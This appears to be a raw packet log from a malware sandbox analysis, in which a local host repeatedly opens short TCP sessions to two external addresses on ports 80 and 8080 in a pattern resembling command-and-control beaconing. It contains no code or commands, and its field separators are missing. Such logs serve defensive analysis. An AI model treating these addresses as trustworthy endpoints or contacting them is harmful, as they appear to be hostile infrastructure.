                                          Sep 27, 2021 20:26:06.359682083 CEST4979480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:06.445668936 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.450172901 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451128960 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451157093 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451256990 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451283932 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451288939 CEST497958080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:06.451313019 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451333046 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.451376915 CEST497958080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:06.451457024 CEST497958080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:06.452528954 CEST497958080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:06.582088947 CEST4979680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:06.582274914 CEST80804979523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.693104982 CEST8049796107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:06.693648100 CEST4979680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:06.693687916 CEST4979680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:06.694969893 CEST4979680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:06.738135099 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:06.802670002 CEST8049796107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:06.843967915 CEST8049796107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:06.869609118 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:06.872461081 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:06.873683929 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.005326033 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.006127119 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.006205082 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.106373072 CEST8049796107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.106709957 CEST8049796107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.106790066 CEST4979680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:07.137645960 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.137851954 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.138576031 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.143018007 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.270019054 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.274482965 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275423050 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275489092 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275506020 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.275510073 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275547028 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.275569916 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275574923 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.275592089 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275609970 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.275618076 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.275644064 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.275667906 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.276273966 CEST497978080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.307940006 CEST4979880192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:07.407927036 CEST80804979723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.416919947 CEST8049798107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.417017937 CEST4979880192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:07.417212963 CEST4979880192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:07.417270899 CEST4979880192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:07.526005983 CEST8049798107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.552124023 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.567334890 CEST8049798107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.678374052 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.678503036 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.679634094 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.804661989 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.806143045 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.806233883 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.873385906 CEST8049798107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.873413086 CEST8049798107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:07.873625994 CEST4979880192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:07.933649063 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:07.933796883 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.934225082 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:07.938051939 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.033504009 CEST4980080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.062359095 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.062884092 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064519882 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064610958 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.064657927 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064723015 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.064740896 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064800024 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.064805984 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064867973 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064887047 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.064903975 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.064977884 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.066046953 CEST497998080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.142745972 CEST8049800107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.142874956 CEST4980080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.143009901 CEST4980080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.143063068 CEST4980080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.191186905 CEST80804979923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.251625061 CEST8049800107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.291654110 CEST8049800107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.354283094 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.479448080 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.479582071 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.480793953 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.534300089 CEST8049800107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.534329891 CEST8049800107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.534486055 CEST4980080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.606183052 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.608706951 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.608867884 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.695436001 CEST4980280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.736454964 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.736588955 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.737042904 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.740912914 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.840812922 CEST8049802107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.840934992 CEST4980280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.841104984 CEST4980280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.841152906 CEST4980280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:08.862452984 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.866893053 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868231058 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868268967 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868297100 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868325949 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.868375063 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.868402958 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868453026 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.868633032 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868655920 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:08.868827105 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.868840933 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.869297981 CEST498018080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:08.950072050 CEST8049802107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.990871906 CEST8049802107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:08.994766951 CEST80804980123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.159665108 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.234930038 CEST8049802107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.234970093 CEST8049802107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.235141993 CEST4980280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:09.290807962 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.290931940 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.291810989 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.386369944 CEST4980480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:09.422661066 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.424917936 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.425044060 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.495553017 CEST8049804107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.495726109 CEST4980480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:09.495845079 CEST4980480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:09.495902061 CEST4980480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:09.556062937 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.556224108 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.556725025 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.560748100 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.605165958 CEST8049804107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.645823002 CEST8049804107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.687509060 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.691698074 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693516016 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693547010 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693566084 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693610907 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693627119 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.693660021 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.693707943 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.693717003 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693732977 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.693778038 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.694444895 CEST498038080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:09.825233936 CEST80804980323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:09.906132936 CEST8049804107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.906173944 CEST8049804107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:09.906260014 CEST4980480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:09.956942081 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.072796106 CEST4980680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.083276987 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.083386898 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.084103107 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.181718111 CEST8049806107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:10.181842089 CEST4980680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.182096958 CEST4980680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.182193995 CEST4980680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.211879969 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.212040901 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.213396072 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.290782928 CEST8049806107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:10.331473112 CEST8049806107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:10.339752913 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.340310097 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.340338945 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.343163967 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.465569019 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.468388081 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469096899 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469280005 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.469290018 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469337940 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469397068 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.469398975 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469413996 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.469446898 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469465017 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.469505072 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.469561100 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.469628096 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.470668077 CEST498058080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.596213102 CEST80804980523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.603671074 CEST8049806107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:10.603696108 CEST8049806107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:10.603797913 CEST4980680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.769087076 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.786905050 CEST4981080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.890256882 CEST8049810107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:10.890408039 CEST4981080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.890607119 CEST4981080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.890681982 CEST4981080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:10.895124912 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:10.895298004 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.896018982 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:10.994555950 CEST8049810107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.022089005 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.023889065 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.023998022 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.034024954 CEST8049810107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.149882078 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.149981022 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.150449038 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.154561996 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.277129889 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.280546904 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281517029 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281569958 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281596899 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.281644106 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.281691074 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281742096 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.281743050 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281771898 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281790972 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.281800032 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.281833887 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.283413887 CEST498098080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.326118946 CEST8049810107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.326148033 CEST8049810107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.326212883 CEST4981080192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:11.409333944 CEST80804980923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.478013992 CEST4981180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:11.551311016 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.588092089 CEST8049811107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.588215113 CEST4981180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:11.588450909 CEST4981180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:11.588458061 CEST4981180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:11.683990955 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.684077978 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.689254045 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.698765039 CEST8049811107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.738790989 CEST8049811107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:11.821233034 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.821273088 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.821485043 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.953375101 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:11.953450918 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.953989029 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:11.957726955 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.021758080 CEST8049811107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.021792889 CEST8049811107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.021893024 CEST4981180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.090712070 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.090929985 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.091010094 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.091069937 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.091087103 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.091094971 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.091126919 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.091151953 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.092750072 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.092781067 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.092848063 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.092983007 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.093049049 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.093544960 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.093571901 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.179816008 CEST4981380192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.226847887 CEST80804981223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.227550983 CEST498128080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.288649082 CEST8049813107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.288877010 CEST4981380192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.289050102 CEST4981380192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.289184093 CEST4981380192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.378161907 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.400264978 CEST8049813107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.440912962 CEST8049813107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.503876925 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.504304886 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.504856110 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.631705046 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.635025978 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.635140896 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.714524984 CEST8049813107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.714586020 CEST8049813107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.714672089 CEST4981380192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.761497021 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.762309074 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.762650013 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.765064001 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.879051924 CEST4981580192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.888254881 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.890887976 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.891776085 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.891833067 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.891891956 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.891896963 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.891983032 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.892005920 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.892023087 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:12.892035961 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.892057896 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.892087936 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.892498970 CEST498148080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:12.988778114 CEST8049815107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:12.988893032 CEST4981580192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.989154100 CEST4981580192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:12.989177942 CEST4981580192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:13.019908905 CEST80804981423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.097758055 CEST8049815107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:13.138643026 CEST8049815107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:13.144259930 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.272927046 CEST80804981623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.273087025 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.273922920 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.383555889 CEST8049815107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:13.388428926 CEST8049815107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:13.390372992 CEST4981580192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:13.403908014 CEST80804981623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.403939962 CEST80804981623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.410432100 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.539716005 CEST80804981623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.539787054 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.539818048 CEST4981780192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:13.540265083 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.543049097 CEST498168080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:13.649938107 CEST8049817107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:13.650074005 CEST4981780192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:13.650248051 CEST4981780192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:13.650305033 CEST4981780192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:13.666739941 CEST80804981623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.668718100 CEST80804981623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:13.669523001 CEST80804981623.82.140.206192.168.2.7
